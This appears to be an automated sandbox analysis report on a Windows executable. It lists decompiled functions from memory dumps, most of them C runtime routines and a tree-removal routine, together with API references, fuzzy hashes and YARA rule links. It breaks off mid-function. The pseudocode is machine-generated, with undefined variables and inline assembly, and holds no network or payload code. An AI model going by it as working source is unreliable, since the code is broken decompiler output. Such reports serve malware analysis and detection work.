0x00434f02
0x00434f0f
0x00434f14
0x00434f2f
0x00434f2f
0x00434f35

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00434EF8
GetLastError.KERNEL32(?,004305F6,00000000,00000001,00000000,00000000,?,00426CD6,?,0041C230,00000000,?,00000000,?,0042722A,?), ref: 00434F04

Part of subcall function 00434ECA: CloseHandle.KERNEL32(FFFFFFFE), ref: 00434EDA

___initconout.LIBCMT ref: 00434F14

Part of subcall function 00434E8C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00434E9F

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00434F29

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6a6090313ec4bfa0ce2dc38ba69b32133b8773c72f6ba56eb45c1579312bd366
Instruction ID: d51624ede5394076c100f57083336747eb4fb3fafc3fa09c72e9230be7d6e5f5
Opcode Fuzzy Hash: 6a6090313ec4bfa0ce2dc38ba69b32133b8773c72f6ba56eb45c1579312bd366
Instruction Fuzzy Hash: 94F03036000119BBCF222FD2EC05ACE3F26FB493A5F055021FA5885131D7329920DBD8

Uniqueness

Uniqueness Score: 0.70%

Function 00434EE1, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000), ref: 00434EF8
GetLastError.KERNEL32(?,004305F6,00000000,00000001,00000000,00000000,?,00426CD6,00000000,?,00000000,00000000,00000000,?,0042722A,00000020), ref: 00434F04

Part of subcall function 00434ECA: CloseHandle.KERNEL32(0044C000), ref: 00434EDA

___initconout.LIBCMT ref: 00434F14

Part of subcall function 00434E8C: CreateFileW.KERNEL32(004456A0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00434E9F

WriteConsoleW.KERNEL32(00000000,?,?,00000000), ref: 00434F29

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6a6090313ec4bfa0ce2dc38ba69b32133b8773c72f6ba56eb45c1579312bd366
Instruction ID: d51624ede5394076c100f57083336747eb4fb3fafc3fa09c72e9230be7d6e5f5
Opcode Fuzzy Hash: 6a6090313ec4bfa0ce2dc38ba69b32133b8773c72f6ba56eb45c1579312bd366
Instruction Fuzzy Hash: 94F03036000119BBCF222FD2EC05ACE3F26FB493A5F055021FA5885131D7329920DBD8

Uniqueness

Uniqueness Score: 0.70%

Function 004230EB, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004230EB() {

				E004214E2( *0x44e17c);
				 *0x44e17c = 0;
				E004214E2( *0x44e180);
				 *0x44e180 = 0;
				E004214E2( *0x44e298);
				 *0x44e298 = 0;
				E004214E2( *0x44e29c);
				 *0x44e29c = 0;
				return 1;
			}

0x004230f4
0x00423101
0x00423107
0x00423112
0x00423118
0x00423123
0x00423129
0x00423131
0x0042313a

APIs

_free.LIBCMT ref: 004230F4

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

_free.LIBCMT ref: 00423107
_free.LIBCMT ref: 00423118
_free.LIBCMT ref: 00423129

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9a696cda6c8bbdf22970c4239026949aa6703807d47a10bc75701a8894a610ec
Instruction ID: 85f7c45b08f992b4d87a4eec4db3f0b07e2ebfd10461b564bf9d6f4498255678
Opcode Fuzzy Hash: 9a696cda6c8bbdf22970c4239026949aa6703807d47a10bc75701a8894a610ec
Instruction Fuzzy Hash: 7CE04F786105309BD6113F63BC828053F25B71A71439090ABF81802231C7790412DF8C

Uniqueness

Uniqueness Score: 0.14%

Function 004230EB, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004230F4

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

_free.LIBCMT ref: 00423107
_free.LIBCMT ref: 00423118
_free.LIBCMT ref: 00423129

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6fe67137ee90436e4d7f10945849d3af98acc582291e3b5ff6569f2370cafaad
Instruction ID: 85f7c45b08f992b4d87a4eec4db3f0b07e2ebfd10461b564bf9d6f4498255678
Opcode Fuzzy Hash: 6fe67137ee90436e4d7f10945849d3af98acc582291e3b5ff6569f2370cafaad
Instruction Fuzzy Hash: 7CE04F786105309BD6113F63BC828053F25B71A71439090ABF81802231C7790412DF8C

Uniqueness

Uniqueness Score: 0.14%

Function 0041F5B3, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

\, xrefs: 0041F816

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ModulePresent$DebugDebuggerFeatureFileHandleNameOutputProcessorString
String ID: \
API String ID: 1857476334-2967466578
Opcode ID: 0021f3ee90d5de9859534ba5a469ce91df539cb172022303bbdeda101e39313f
Instruction ID: fa9155ae618e4fe32d686e420b103bb10f6cea18b3257b2fb0984b93e01d1be7
Opcode Fuzzy Hash: 0021f3ee90d5de9859534ba5a469ce91df539cb172022303bbdeda101e39313f
Instruction Fuzzy Hash: 14E14B71A0011A76CB24AA65DC8AFEB376CDFA5704F5404BFFC05D1241F638AE8AC66D

Uniqueness

Uniqueness Score: 0.89%

Function 00421B1D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00421BAD
__startOneArgErrorHandling.LIBCMT ref: 0042C05E

Strings

pow, xrefs: 00421B85, 00421BA2

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 9d15ee26bb358c7529beaf0753143144d4ecafa2583923fe8dc7b4b6d241fd34
Instruction ID: e4302db6f4b72932a92b2d6ba9439167510c5f58bc3f99763ff2a49f98a0ec3d
Opcode Fuzzy Hash: 9d15ee26bb358c7529beaf0753143144d4ecafa2583923fe8dc7b4b6d241fd34
Instruction Fuzzy Hash: 98515A61B0412196CB117B15FD4237F2BA4EF60750FA0497BF095823B9FB3D8C969A8E

Uniqueness

Uniqueness Score: 0.20%

Function 00421B1D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00421BAD
__startOneArgErrorHandling.LIBCMT ref: 0042C05E

Strings

pow, xrefs: 00421B85, 00421BA2

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 936b4c4bec2423524dd807cb5e6b89e0aee1792f02354578ccb6e00817de4bb8
Instruction ID: e4302db6f4b72932a92b2d6ba9439167510c5f58bc3f99763ff2a49f98a0ec3d
Opcode Fuzzy Hash: 936b4c4bec2423524dd807cb5e6b89e0aee1792f02354578ccb6e00817de4bb8
Instruction Fuzzy Hash: 98515A61B0412196CB117B15FD4237F2BA4EF60750FA0497BF095823B9FB3D8C969A8E

Uniqueness

Uniqueness Score: 0.20%

Function 0040F750, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119
UNIQUE

Download Yara Rule

C-Code - Quality: 65%

			E0040F750(signed int* __ecx, char* _a4, intOrPtr _a8, char* _a12, char _a40) {
				char* _v8;
				char* _v16;
				signed int* _v24;
				signed int* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				signed int* _v56;
				intOrPtr _v64;
				char _v68;
				void* _v76;
				char _v80;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				char _v100;
				intOrPtr _v120;
				intOrPtr* _v124;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t132;
				signed int _t151;
				signed int _t160;
				signed int _t166;
				intOrPtr* _t169;
				char* _t172;
				intOrPtr _t183;
				intOrPtr _t195;
				signed int _t197;
				signed int _t198;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				void* _t205;
				intOrPtr* _t206;
				intOrPtr* _t208;
				signed int _t212;
				signed int _t215;
				signed int _t216;
				void* _t221;
				intOrPtr* _t225;
				signed int* _t226;
				char** _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int* _t234;
				signed int _t236;
				signed int _t239;
				signed int _t240;
				signed int* _t243;
				signed int _t244;
				char** _t245;
				intOrPtr* _t246;
				signed int _t249;
				signed int _t270;
				signed int _t271;
				signed int _t283;
				signed int _t284;
				intOrPtr _t291;
				intOrPtr _t293;
				intOrPtr* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int* _t301;
				intOrPtr* _t302;
				signed int* _t312;
				signed int* _t313;
				intOrPtr _t314;
				char _t315;
				signed int _t316;
				signed int _t321;
				intOrPtr* _t322;
				intOrPtr _t324;
				signed int _t331;
				char* _t332;
				intOrPtr _t335;
				void* _t338;
				void* _t339;
				void* _t340;
				void* _t341;
				char* _t342;

				_t243 = __ecx;
				_t339 = _t338 - 0x10;
				_t312 = __ecx;
				_t132 =  *__ecx;
				if(_t132 == 0) {
					_a4 = "Can\'t remove from empty tree";
					E00416C8D( &_a4, 0x447c2c);
					goto L23;
				} else {
					_t243 = _a4;
					_push(_t226);
					_push(_t301);
					_t2 =  &(_t312[1]); // 0x4
					_t301 = _t2;
					_t298 =  *_t243;
					if( *_t132 != _t298) {
						_t240 =  *_t301;
						__eflags = _t240;
						if(_t240 == 0) {
							L12:
							_t212 = _t312[2];
							_t10 =  &(_t312[2]); // 0x8
							_t226 = _t10;
							__eflags = _t212;
							if(_t212 == 0) {
								L23:
								_a12 = "Information not found";
								E00416C8D( &_a12, 0x447c2c);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t340 = _t339 - 8;
								_push(_t312);
								_t313 = _t243;
								_t244 =  *_t313;
								__eflags = _t244;
								if(_t244 == 0) {
									_v16 = "Can\'t remove from empty tree";
									E00416C8D( &_v16, 0x447c2c);
									goto L50;
								} else {
									_t295 = _v16;
									_push(_t226);
									_push(_t301);
									_t301 =  &(_t313[1]);
									_t195 =  *_t295;
									__eflags =  *_t244 - _t195;
									if( *_t244 != _t195) {
										_t236 =  *_t301;
										__eflags = _t236;
										if(_t236 == 0) {
											L38:
											_t244 = _t313[2];
											_t226 =  &(_t313[2]);
											__eflags = _t244;
											if(_t244 == 0) {
												L50:
												_v8 = "Information not found";
												E00416C8D( &_v8, 0x447c2c);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_t341 = _t340 - 0x18;
												_push(_t226);
												_push(_t313);
												_push(_t301);
												_t331 = _t244;
												_t245 =  &_a4;
												E0040E900(_t245,  &_v56, _v28);
												_t314 = _a8;
												__eflags = _v64 - _t314;
												if(_v64 == _t314) {
													L58:
													_v28 = 0x43798c;
													E00416C8D( &_v28, 0x447c2c);
													asm("int3");
													_t342 = _t341 - 0x10;
													_push(_t226);
													_push(_t314);
													_t315 = _v68;
													_push(_t301);
													_t227 = _t245;
													_t246 = _t227 + 4;
													E0040E900(_t246,  &_v68, _t315);
													__eflags = _v76 -  *((intOrPtr*)(_t227 + 8));
													if(_v76 ==  *((intOrPtr*)(_t227 + 8))) {
														_v68 = 0x4379ac;
														E00416C8D( &_v76, 0x447c2c); // executed
														asm("int3");
														asm("int3");
														asm("int3");
														_push(_t331);
														_t332 = _t342;
														_push(0xffffffff);
														_push(E00435D80);
														_push( *[fs:0x0]);
														 *[fs:0x0] = _t342;
														_push(_t227);
														_push(_t315);
														_push(_t301);
														_v120 = _t342 - 8;
														_t302 = _t246;
														_v124 = _t302;
														_t151 =  *(_t302 + 4);
														_t291 =  *_t302;
														_t249 = _t151 - _t291 >> 2;
														_t316 = _v96;
														__eflags = _t249 - _t316;
														if(__eflags <= 0) {
															if(__eflags >= 0) {
																goto L68;
															} else {
																_t229 = _a8;
																__eflags = _t229 - _t151;
																if(_t229 >= _t151) {
																	L73:
																	__eflags = _t316 - _t249;
																	E0040BCA0(_t229, _t302, _t332, _t316 - _t249);
																} else {
																	__eflags = _t291 - _t229;
																	if(_t291 > _t229) {
																		goto L73;
																	} else {
																		_t232 = _t229 - _t291 >> 2;
																		E0040BCA0(_t232, _t302, _t332, _t316 - _t249);
																		_t229 =  *_t302 + _t232 * 4;
																	}
																}
																_v8 = 0;
																E0040C490(_t302,  *(_t302 + 4), _t316 - ( *(_t302 + 4) -  *_t302 >> 2), _t229);
																_v8 = 0xffffffff;
																_t160 =  *(_t302 + 4) -  *_t302 >> 2;
																_t129 = _t302 + 4;
																 *_t129 =  *(_t302 + 4) + (_t316 - _t160 << 2);
																__eflags =  *_t129;
																 *[fs:0x0] = _v16;
																return _t160;
															}
														} else {
															_t321 = _t316 - _t249;
															__eflags = _t321;
															_t151 = _t151 + _t321 * 4;
															 *(_t302 + 4) = _t151;
															L68:
															 *[fs:0x0] = _v16;
															return _t151;
														}
													} else {
														E0040E900(_t227 + 4,  &_v76, _t315);
														_t166 = _v76;
														__eflags = _t166 -  *((intOrPtr*)(_t227 + 8));
														if(_t166 ==  *((intOrPtr*)(_t227 + 8))) {
															_v88 = _t315;
															E004034A0(_t227 + 4, _t331,  &_v80, 0x4375cc,  &_v88,  &_v68);
															_t166 = _v96;
														}
														_push(_t331);
														_t335 =  *((intOrPtr*)(_t166 + 0x20));
														E0040DC10(_t227 + 4,  &_v88, _t315);
														_t322 = _v96;
														_t169 = _t322;
														_t293 = _v92;
														__eflags = _t322 - _t293;
														if(_t322 != _t293) {
															do {
																_t169 =  *_t169;
																__eflags = _t169 - _t293;
															} while (_t169 != _t293);
														}
														E0040DE90(_t227, _t335,  &_v68, _t322, _t293);
														_t172 =  &_v100;
														_v96 = 0;
														_push(_t172);
														_v100 = _t335;
														L24();
														return _t172;
													}
												} else {
													_t226 = _v24;
													_t245 =  &_a4;
													E0040E900(_t245,  &_v24, _t226);
													__eflags = _v32 - _t314;
													if(_v32 == _t314) {
														goto L58;
													} else {
														asm("movsd xmm0, [0x437b90]");
														asm("movsd [esp+0x28], xmm0");
														E0040E900( &_a4,  &_v24, _t226);
														_t324 = _v32;
														__eflags = _t324 - _a8;
														if(_t324 == _a8) {
															_v56 = _t226;
															E004034A0( &_a4, _t331,  &_v52, 0x4375cc,  &_v56,  &_v24);
															_t324 = _v68;
														}
														_t234 = _v28;
														E0040E900( &_a4,  &_v28, _t234);
														_t183 = _v36;
														__eflags = _t183 - _a8;
														if(_t183 == _a8) {
															_v24 = _t234;
															E004034A0( &_a4, _t331,  &_v52, 0x4375cc,  &_v24,  &_v28);
															_t183 = _v68;
														}
														_v48 =  *((intOrPtr*)(_t324 + 0x20));
														_v52 =  &_a40;
														_v44 =  *((intOrPtr*)(_t183 + 0x20));
														return E00405330( &_v52,  *((intOrPtr*)(_t183 + 0x20)),  &_v40);
													}
												}
											} else {
												_push(_t295);
												L24();
												goto L40;
											}
										} else {
											__eflags = _t195 -  *_t244;
											if(_t195 <  *_t244) {
												L37:
												_push(_t295);
												L24();
												_push(_t301);
												goto L41;
											} else {
												__eflags =  *_t244 - _t195;
												if( *_t244 < _t195) {
													goto L38;
												} else {
													__eflags =  *((intOrPtr*)(_t295 + 4)) -  *((intOrPtr*)(_t244 + 4));
													if( *((intOrPtr*)(_t295 + 4)) >=  *((intOrPtr*)(_t244 + 4))) {
														goto L38;
													} else {
														goto L37;
													}
												}
											}
										}
									} else {
										_t203 =  *_t301;
										__eflags = _t203;
										if(_t203 == 0) {
											_t204 = _t313[2];
											_t226 =  &(_t313[2]);
											__eflags = _t204;
											if(_t204 == 0) {
												_push(8);
												_t205 = E00415044(_t244);
												 *_t313 = 0;
												_t313[4] = 0;
												_t313[3] = 0;
												return _t205;
											} else {
												_t206 = E0040F270(_t204, _t295,  &_v28);
												_t296 =  *_t313;
												 *_t296 =  *_t206;
												 *((intOrPtr*)(_t296 + 4)) =  *((intOrPtr*)(_t206 + 4));
												L40:
												_push(_t226);
												L41:
												E0040D260();
												goto L42;
											}
										} else {
											_t208 = E0040F080(_t203, _t295,  &_v28);
											_t297 =  *_t313;
											 *_t297 =  *_t208;
											 *((intOrPtr*)(_t297 + 4)) =  *((intOrPtr*)(_t208 + 4));
											_t239 =  *_t301;
											__eflags = _t239;
											if(_t239 != 0) {
												__eflags =  *_t239;
												if( *_t239 == 0) {
													E00404C10(_t239, _t301);
													_push(0x14);
													E00415044(_t239);
													_t340 = _t340 + 8;
													 *_t301 = 0;
												}
											}
											L42:
											_t313[3] = _t313[3] - 1;
											_t270 = _t313[2];
											__eflags = _t270;
											if(_t270 == 0) {
												_t271 = 0;
												__eflags = 0;
											} else {
												_t271 =  *((intOrPtr*)(_t270 + 0x10));
											}
											_t197 =  *_t301;
											__eflags = _t197;
											if(_t197 == 0) {
												_t198 = 0;
												__eflags = 0;
											} else {
												_t198 =  *((intOrPtr*)(_t197 + 0x10));
											}
											__eflags = _t271 - _t198;
											_t199 =  >  ? _t271 : _t198;
											_t200 = ( >  ? _t271 : _t198) + 1;
											__eflags = _t200;
											_t313[4] = _t200;
											return E0040F6C0(_t313);
										}
									}
								}
							} else {
								_push(_t243);
								E0040F750(_t212);
								goto L14;
							}
						} else {
							__eflags = _t298 -  *_t132;
							if(_t298 <  *_t132) {
								L11:
								_push(_t243);
								E0040F750(_t240);
								_push(_t301);
								goto L15;
							} else {
								__eflags =  *_t132 - _t298;
								if(__eflags < 0) {
									goto L12;
								} else {
									asm("movsd xmm0, [eax+0x8]");
									asm("comisd xmm0, [ecx+0x8]");
									if(__eflags <= 0) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					} else {
						_t287 =  *_t301;
						if( *_t301 == 0) {
							_t288 = __ecx[2];
							_t5 =  &(_t312[2]); // 0x8
							_t226 = _t5;
							__eflags = __ecx[2];
							if(__ecx[2] == 0) {
								_push(0x10);
								_t221 = E00415044(_t132);
								 *_t312 = 0;
								_t312[4] = 0;
								_t312[3] = 0;
								return _t221;
							} else {
								 *( *__ecx) =  *((intOrPtr*)(E0040F190(_t288, _t298,  &_v16)));
								asm("movsd xmm0, [eax+0x8]");
								asm("movsd [edx+0x8], xmm0");
								L14:
								_push(_t226);
								goto L15;
							}
						} else {
							_t225 = E0040EFA0(_t287, _t298,  &_v16);
							_push(_t301);
							 *( *__ecx) =  *_t225;
							asm("movsd xmm0, [eax+0x8]");
							asm("movsd [edx+0x8], xmm0");
							L15:
							E0040D200();
							_t312[3] = _t312[3] - 1;
							_t283 = _t312[2];
							if(_t283 == 0) {
								_t284 = 0;
								__eflags = 0;
							} else {
								_t284 =  *((intOrPtr*)(_t283 + 0x10));
							}
							_t215 =  *_t301;
							if(_t215 == 0) {
								_t216 = 0;
								__eflags = 0;
							} else {
								_t216 =  *((intOrPtr*)(_t215 + 0x10));
							}
							_t217 =  >  ? _t284 : _t216;
							_t218 = ( >  ? _t284 : _t216) + 1;
							_t312[4] = ( >  ? _t284 : _t216) + 1;
							return E0040F6C0(_t312);
						}
					}
				}
			}

0x0040f750
0x0040f750
0x0040f754
0x0040f756
0x0040f75a
0x0040f862
0x0040f86b
0x00000000
0x0040f760
0x0040f760
0x0040f764
0x0040f765
0x0040f766
0x0040f766
0x0040f769
0x0040f76d
0x0040f7e3
0x0040f7e5
0x0040f7e7
0x0040f808
0x0040f808
0x0040f80b
0x0040f80b
0x0040f80e
0x0040f810
0x0040f870
0x0040f879
0x0040f882
0x0040f887
0x0040f888
0x0040f889
0x0040f88a
0x0040f88b
0x0040f88c
0x0040f88d
0x0040f88e
0x0040f88f
0x0040f890
0x0040f893
0x0040f894
0x0040f896
0x0040f898
0x0040f89a
0x0040f9c6
0x0040f9cf
0x00000000
0x0040f8a0
0x0040f8a0
0x0040f8a4
0x0040f8a5
0x0040f8a6
0x0040f8a9
0x0040f8ab
0x0040f8ad
0x0040f94d
0x0040f94f
0x0040f951
0x0040f96e
0x0040f96e
0x0040f971
0x0040f974
0x0040f976
0x0040f9d4
0x0040f9dd
0x0040f9e6
0x0040f9eb
0x0040f9ec
0x0040f9ed
0x0040f9ee
0x0040f9ef
0x0040f9f0
0x0040f9f3
0x0040f9f5
0x0040f9f6
0x0040f9fb
0x0040fa02
0x0040fa05
0x0040fa0a
0x0040fa0d
0x0040fa11
0x0040fae8
0x0040faf1
0x0040fafa
0x0040faff
0x0040fb00
0x0040fb03
0x0040fb04
0x0040fb05
0x0040fb0d
0x0040fb0e
0x0040fb12
0x0040fb15
0x0040fb1e
0x0040fb25
0x0040fbc0
0x0040fbc8
0x0040fbcd
0x0040fbce
0x0040fbcf
0x0040fbd0
0x0040fbd1
0x0040fbd3
0x0040fbd5
0x0040fbe0
0x0040fbe1
0x0040fbeb
0x0040fbec
0x0040fbed
0x0040fbee
0x0040fbf1
0x0040fbf3
0x0040fbf6
0x0040fbf9
0x0040fbff
0x0040fc02
0x0040fc05
0x0040fc07
0x0040fc24
0x00000000
0x0040fc26
0x0040fc26
0x0040fc29
0x0040fc2b
0x0040fc49
0x0040fc4b
0x0040fc50
0x0040fc2d
0x0040fc2d
0x0040fc2f
0x00000000
0x0040fc31
0x0040fc33
0x0040fc3d
0x0040fc44
0x0040fc44
0x0040fc2f
0x0040fc55
0x0040fc6f
0x0040fc74
0x0040fc80
0x0040fc88
0x0040fc88
0x0040fc88
0x0040fc8e
0x0040fc9b
0x0040fc9b
0x0040fc09
0x0040fc09
0x0040fc09
0x0040fc0b
0x0040fc0e
0x0040fc11
0x0040fc14
0x0040fc21
0x0040fc21
0x0040fb2b
0x0040fb30
0x0040fb35
0x0040fb39
0x0040fb3c
0x0040fb42
0x0040fb59
0x0040fb5e
0x0040fb5e
0x0040fb62
0x0040fb63
0x0040fb6f
0x0040fb74
0x0040fb78
0x0040fb7a
0x0040fb7e
0x0040fb80
0x0040fb82
0x0040fb82
0x0040fb84
0x0040fb84
0x0040fb82
0x0040fb92
0x0040fb97
0x0040fb9b
0x0040fba3
0x0040fba7
0x0040fbab
0x0040fbb7
0x0040fbb7
0x0040fa17
0x0040fa17
0x0040fa21
0x0040fa24
0x0040fa29
0x0040fa2d
0x00000000
0x0040fa33
0x0040fa33
0x0040fa44
0x0040fa4a
0x0040fa4f
0x0040fa53
0x0040fa56
0x0040fa5c
0x0040fa73
0x0040fa78
0x0040fa78
0x0040fa7c
0x0040fa89
0x0040fa8e
0x0040fa92
0x0040fa95
0x0040fa9b
0x0040fab2
0x0040fab7
0x0040fab7
0x0040fac4
0x0040facc
0x0040fad5
0x0040fae5
0x0040fae5
0x0040fa2d
0x0040f978
0x0040f978
0x0040f979
0x00000000
0x0040f979
0x0040f953
0x0040f953
0x0040f955
0x0040f963
0x0040f963
0x0040f966
0x0040f96b
0x00000000
0x0040f957
0x0040f957
0x0040f959
0x00000000
0x0040f95b
0x0040f95e
0x0040f961
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f961
0x0040f959
0x0040f955
0x0040f8b3
0x0040f8b3
0x0040f8b5
0x0040f8b7
0x0040f901
0x0040f904
0x0040f907
0x0040f909
0x0040f925
0x0040f928
0x0040f930
0x0040f936
0x0040f93d
0x0040f94a
0x0040f90b
0x0040f912
0x0040f917
0x0040f91b
0x0040f920
0x0040f97e
0x0040f97e
0x0040f97f
0x0040f981
0x00000000
0x0040f981
0x0040f8b9
0x0040f8c0
0x0040f8c5
0x0040f8c9
0x0040f8ce
0x0040f8d1
0x0040f8d3
0x0040f8d5
0x0040f8db
0x0040f8de
0x0040f8e6
0x0040f8eb
0x0040f8ee
0x0040f8f3
0x0040f8f6
0x0040f8f6
0x0040f8de
0x0040f986
0x0040f986
0x0040f989
0x0040f98c
0x0040f98e
0x0040f995
0x0040f995
0x0040f990
0x0040f990
0x0040f990
0x0040f997
0x0040f999
0x0040f99b
0x0040f9a2
0x0040f9a2
0x0040f99d
0x0040f99d
0x0040f99d
0x0040f9a4
0x0040f9a6
0x0040f9ab
0x0040f9ab
0x0040f9ac
0x0040f9ba
0x0040f9ba
0x0040f8b7
0x0040f8ad
0x0040f812
0x0040f812
0x0040f815
0x00000000
0x0040f815
0x0040f7e9
0x0040f7e9
0x0040f7eb
0x0040f7fd
0x0040f7fd
0x0040f800
0x0040f805
0x00000000
0x0040f7ed
0x0040f7ed
0x0040f7ef
0x00000000
0x0040f7f1
0x0040f7f1
0x0040f7f6
0x0040f7fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f7fb
0x0040f7ef
0x0040f7eb
0x0040f76f
0x0040f76f
0x0040f773
0x0040f795
0x0040f798
0x0040f798
0x0040f79b
0x0040f79d
0x0040f7bb
0x0040f7be
0x0040f7c6
0x0040f7cc
0x0040f7d3
0x0040f7e0
0x0040f79f
0x0040f7ad
0x0040f7af
0x0040f7b4
0x0040f81a
0x0040f81a
0x00000000
0x0040f81a
0x0040f775
0x0040f77a
0x0040f781
0x0040f784
0x0040f786
0x0040f78b
0x0040f81b
0x0040f81d
0x0040f822
0x0040f825
0x0040f82a
0x0040f831
0x0040f831
0x0040f82c
0x0040f82c
0x0040f82c
0x0040f833
0x0040f837
0x0040f83e
0x0040f83e
0x0040f839
0x0040f839
0x0040f839
0x0040f842
0x0040f847
0x0040f848
0x0040f856
0x0040f856
0x0040f773
0x0040f76d

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040F86B

Part of subcall function 00416C8D: KiUserExceptionDispatcher.NTDLL(?,?,0041371A,?,00000008,?,1FFFFFFF,?,?,?,?,0041371A,?,00447D68,?), ref: 00416CEC

__CxxThrowException@8.LIBVCRUNTIME ref: 0040F882

Strings

`zC, xrefs: 0040F862

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Exception@8Throw$DispatcherExceptionUser
String ID: `zC
API String ID: 4200477539-2375258980
Opcode ID: 7252be7a72a7db94a766a50ea8f61e2cabf338b4f7357c97a2cfc807bf3c1941
Instruction ID: 78184d18f34853062c556af612f2326f7e9b34a470f223d1a91b51069edb9142
Opcode Fuzzy Hash: 7252be7a72a7db94a766a50ea8f61e2cabf338b4f7357c97a2cfc807bf3c1941
Instruction Fuzzy Hash: 35419F71604701CFD738EF25C480A67B3E8BF88704B10897FE496AB691D778E889CB59

Uniqueness

Uniqueness Score: 100.00%

Function 0040BD14, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113
UNIQUE

Download Yara Rule

C-Code - Quality: 70%

			E0040BD14(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				char _v20;
				short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
